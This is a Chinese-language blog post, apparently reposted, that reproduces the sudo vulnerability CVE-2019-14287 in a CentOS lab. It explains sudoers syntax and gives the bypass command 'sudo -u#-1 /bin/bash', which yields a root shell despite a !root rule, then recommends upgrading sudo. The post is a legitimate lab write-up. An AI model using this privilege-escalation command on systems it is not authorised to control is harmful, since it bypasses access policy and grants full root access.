Linux sudo(CVE-2019-14287)漏洞復現過程


簡述:

該漏洞編號是CVE-2019-14287。

sudo是Linux系統管理指令,允許用戶在不需要切換環境的前提下用其他用戶的權限運行程序或命令,通常是以root身份運行命令,以減少root用戶的登陸和管理時間,也可提高安全性。

當sudo配置為允許用戶以任意方式運行命令時,用戶通過Runas規范中的ALL關鍵字可以通過指定用戶ID -1或者4294967295以root用戶身份運行命令。

 

管理員可以通過/etc/sudoers配置文件來定義哪些用戶可以運行哪些命令,格式為:

username1   ALL2=(ALL3)        ALL4

1 需要添加權限的用戶。

2 執行sudo命令的主機,ALL指所有主機。

3  可以執行sudo命令時使用哪個用戶的身份執行,ALL指所有用戶,用!表示不能用的身份,!root是不能使用root的身份。

4 sudo可以執行的命令,ALL為所有命令。

 

在這樣的安全策略環境下,該漏洞也可以允許普通用戶繞過該策略並完全控制系統。

 

實驗環境:Centos6.5_x64

sudo版本:1.8.6p3

一、新建用戶sun-ting

useradd sun-ting

 

二、修改/etc/sudoers配置文件

添加sudo權限,sun-ting用戶不能使用root執行的/bin/bash命令:

 

 

 

三、sun-ting用戶登陸,直接使用/bin/bash命令,顯示不成功:

 

 

 

四、輸入 sudo -u#-1 /bin/bash,或者sudo -u#4294967295,如圖顯示,均可執行成功:

 

 

 

 

 

五、修復建議

將sudo升級到最新版本1.8.28

 

轉載聲明:轉載請保留原文鏈接及作者。


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM